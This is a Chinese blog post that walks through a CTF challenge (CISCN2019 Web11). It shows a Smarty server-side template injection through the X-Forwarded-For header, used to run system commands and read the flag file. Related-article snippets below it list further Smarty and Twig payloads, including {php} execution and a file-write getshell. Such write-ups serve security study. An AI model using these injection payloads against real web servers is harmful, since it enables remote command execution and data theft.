Smarty SSTI--[CISCN2019 华东南赛区]Web11

最新推荐文章于 2024-03-20 01:10:06 发布
最新推荐文章于 2024-03-20 01:10:06 发布
阅读量192 收藏
点赞数
分类专栏: CTF WEB 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/K1ose/article/details/114525652
版权

访问页面,页脚提示smarty;

根据先前对Smarty的接触,比较了解的是SSTI的漏洞;

题目提示了XFF,试一下XFF处有没有SSTI漏洞注入点;

抓包修改,添加XFF;

{{7*7}}

可以注意到response的信息中,有一处变化;
在这里插入图片描述

证明确实存在SSTI漏洞;

输入

{$smarty.version}

以获得对应的smarty版本;
在这里插入图片描述

输入

{$smarty.template}

以返回当前的模板文件的名称;
在这里插入图片描述

输入

{if system('ls')}{/if}

查看当前目录下的文件;
在这里插入图片描述

输入

{if system('cat /../flag')}{/if}

在这里插入图片描述

拿到flag

flag{71c130dd-21c5-462a-9ef2-0fa87f458c5c}
K1ose
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全 | 1.5w字总结】SSTI漏洞入门
等风来
08-24 7665
SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,它出现在使用模板引擎的Web应用程序中。模板引擎是一种将动态数据与静态模板结合生成最终输出的工具。然而,如果在构建模板时未正确处理用户输入,就可能导致SSTI漏洞的产生。sql注入的成因是:当后端脚本语言进行数据库查询时,可以构造输入语句来进行拼接,从而实现恶意sql查询。
Smarty -  网站+管理员+ RTL
05-14
Smarty - 网站+管理员+ RTLSmarty - 网站+管理员+ RTLSmarty - 网站+管理员+ RTLSmarty - 网站+管理员+ RTLSmarty - 网站+管理员+ RTLSmarty - 网站+管理员+ RTLSmarty - 网站+管理员+ RTLSmarty - 网站+管理员+ ...
WebSmarty SSTI
uuzeray的博客
11-13 342
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。Smarty是基于PHP开发的,故对于SmartySSTI的利用手段与常见的flask的SSTI有很大区别。
SSTI相关总结 (smarty/twig)
桃雾雨Rain的博客
01-30 881
SSTI在用户可控的地方可能发生。 一、PHP smarty注入 smarty是php的一个模板引擎。更明确的来说,它可以帮助开发者更好的分离程序逻辑和页面显示。这里略过一些罗嗦的smarty的介绍。 *payload (1) 获取smarty版本号: {$smarty.version} (2) 执行php代码 {php}echo `id`;{/php} //注意这个在3.x版本的时候就已经废弃了 (3) getshell {Smarty_Internal_Write_File::writ
SSTI漏洞详解
最新发布
2301_80661529的博客
03-20 1629
SSTI(Server-Side Template Injection)就是服务器端模板注入。利用该漏洞可用于直接攻击web服务器的内部。1.SmartySmarty是PHP语言中广泛使用的模板引擎,它提供了强大的模板分离和逻辑控制功能。2.Twig:Twig是一个现代化的PHP模板引擎,被广泛用于Symfony框架等PHP应用程序中。3.Blade:Blade是Laravel框架的默认模板引擎,它提供了简洁的语法和强大的模板继承特性。
Smarty SSTI
蚁景网安学院
11-13 949
Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示(HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多文章往往只是一笔带过,讲解的重心往往在flask等框架上。本篇...
smarty-vscode-support:用于Visual Studio Code的Smarty模板支持扩展
05-01
用于Visual Studio代码的Smarty模板 此扩展为Visual Studio Code提供支持。 支持{...}和{{...}}分隔符。 特征 语法高亮 片段完成 代码格式 代码折叠 代码导航 评论切换 支架自动关闭 支架自动环绕 悬停文档 自动...
Smarty-3.1.16
06-12
总的来说,Smarty-3.1.16是PHP开发中的一个重要工具,它简化了Web应用的前端设计与后端逻辑的结合,提供了丰富的特性和强大的性能优化手段,对于构建高效、可维护的Web项目具有显著的价值。通过熟练掌握Smarty,...
smarty-4.3.2
09-12
11. `functions.php`、`bootstrap.php`和`sysplugins`目录:这些文件和目录包含了Smarty的各种函数和系统插件,提供了对Smarty核心功能的支持。 Smarty 4.3.2版本可能引入了一些新的改进和修复,例如性能优化、bug...
scummvm-web:ScummVM主要网站
04-06
ScummVM网站 该项目是ScummVM的主要网站,位于: : 入门 这些说明将为您提供在本地计算机上运行并运行的...要运行站点的开发版本并在端口8000上启动本地Web服务器,请运行: composer develop 要为生产而构建,只需运
8-14刷题(php反序列化,Smarty ssti,json命令执行)
Realiy的博客
08-14 944
[NPUCTF2020]ReadlezPHP 找到time.php?source,打开的得到time.php的源码 <?php #error_reporting(0); class HelloPhp { public $a; public $b; public function __construct(){ $this->a = "Y-m-d h:i:s"; $this->b = "date"; } publ
smarty ssti的学习--Day32
veinard_F的博客
11-26 536
基于[CISCN2019 华东赛区]Web11这道题目,学习一下smarty sstii smarty是一个php的模板引擎,提供让程序逻辑与页面显示代码(css/html)分离的功能。 smarty利用 {php} Smarty3官方手册里说到已经废弃{php}标签,强烈建议不要使用。在Smarty3.1,{php}仅在SmartyBC中可用。 {literal} php5可用,可以让一个模板区域的字符原样输出,经常用于保护页面上的javascrip或css样式表 {if} Smarty的{if}
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1593
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
[CISCN2019 华东赛区]Web11 1(SSTI,smarty,X-Forwarded-For)
weixin_45577185的博客
10-16 419
知识点: SSTI smarty X-Forwarded-For Smarty是一个PHP的模板引擎,提供让程序逻辑与页面显示 (HTML/CSS)代码分离的功能。对于该框架的SSTI漏洞很多 文章往往只是一笔带过,讲解的重心往往在flask等框架上。 看到这个我就想到了抓包修改XFF试试加入X-Forwarded-For 发现Current IP更改为相应值 回想到曾经做过的题,用SSTI 发现存在注入 获取当前目录有那些文件:X-Forwarded-For:{system(‘ls’)}
[CISCN2019 华东赛区]Web11SSTI smarty X-Forwarded-For
shannidawang的博客
09-10 133
我每天都会叮嘱自己学英语( 我们可以注意到 xff 看了别人的wp sstismarty 查看下根目录下文件 {system('ls \')} 发现cat好像被过滤了 {show_source('/flag')}
SSTI Bypass 学习 (Python3&jinja2
qq_40648358的博客
05-25 1532
SSTI Bypass 学习 (Python3&jinja2 前言 在说Bypass之前咱们先说一下SSTI的基本功 ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范不严谨造成了模板注入漏洞,造成模板可控。 利用流程 获取基本类-&g
攻防世界 web高手进阶区 9分题 smarty
闵行小鱼塘
10-17 3301
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是smarty的writeup
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3361
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
php-smarty-3.1.47-1.el7.noarch.rpm
11-18
php-smarty-3.1.47-1.el7.noarch.rpm是一个用于PHP开发的工具包,其中包含了Smarty模板引擎的软件包。Smarty是一个基于PHP的模板引擎,它允许开发者将页面的展示逻辑与业务逻辑分离,提供了一种更加灵活和易于维护的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值